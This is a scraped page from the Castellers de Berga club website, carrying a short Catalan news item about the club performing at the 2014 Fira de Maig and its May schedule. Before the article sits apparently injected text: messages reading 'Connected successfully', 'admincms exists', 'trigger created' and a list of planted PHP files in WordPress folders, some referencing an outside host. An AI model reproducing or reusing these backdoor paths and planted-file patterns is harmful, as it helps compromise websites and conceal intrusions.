Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?ajax https://castellersdeberga.cat/wp-admin/about-wp-cron-meta-private-cron.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/about-ajax-wp-wp-meta-ajax-response.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-wp-filesystem-ftpext-ajax-response-ajax-response-ajax-meta-wp.php https://castellersdeberga.cat/wp-content/plugins/js_composer/index-cron-stream-private-core-meta.php https://castellersdeberga.cat/wp-content/plugins/google-calendar-events/google-calendar-events-ajax-response-meta-private-private-stream-stream-wp-core.php https://castellersdeberga.cat/wp-includes/class-wp-text-diff-renderer-table-cron-ajax-ajax-response-core-wp-ajax.php https://castellersdeberga.cat/wp-includes/IXR/class-IXR-value-meta-stream.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Dos anys després de la presentació
 

Dos anys després de la presentació


Dos anys després de la presentacióL’1 de maig de 2012, Castellers de Berga es presentaven per primera vegada en públic alçant pilars de 4 durant la Fira de Maig de Berga, davant d’una gran expectació. Dos anys després, actuen a la mateixa fira, aquesta vegada a la Plaça Viladomat, a les 12 del migdia. 
Durant tot el dia, l’entitat berguedana tindrà un estand de la fira. Al vespre, es farà un sorteig d’un pilar entre els establiments col.laboradors de la colla, dins la campanya Aquí fem pinya 2014. L’afortunat podrà escollir dia, hora i lloc perquè la colla hi vagi a fer un pilar.

D’altra banda, les actuacions continuen aquest mes de maig. Diumenge 4, a la Fira de Primavera de Navàs, amb Castellers de Mollet. Diumenge 11, al Roseret, a Sant Jordi (Cercs) i diumenge 18, a Borredà, amb Salats de Súria.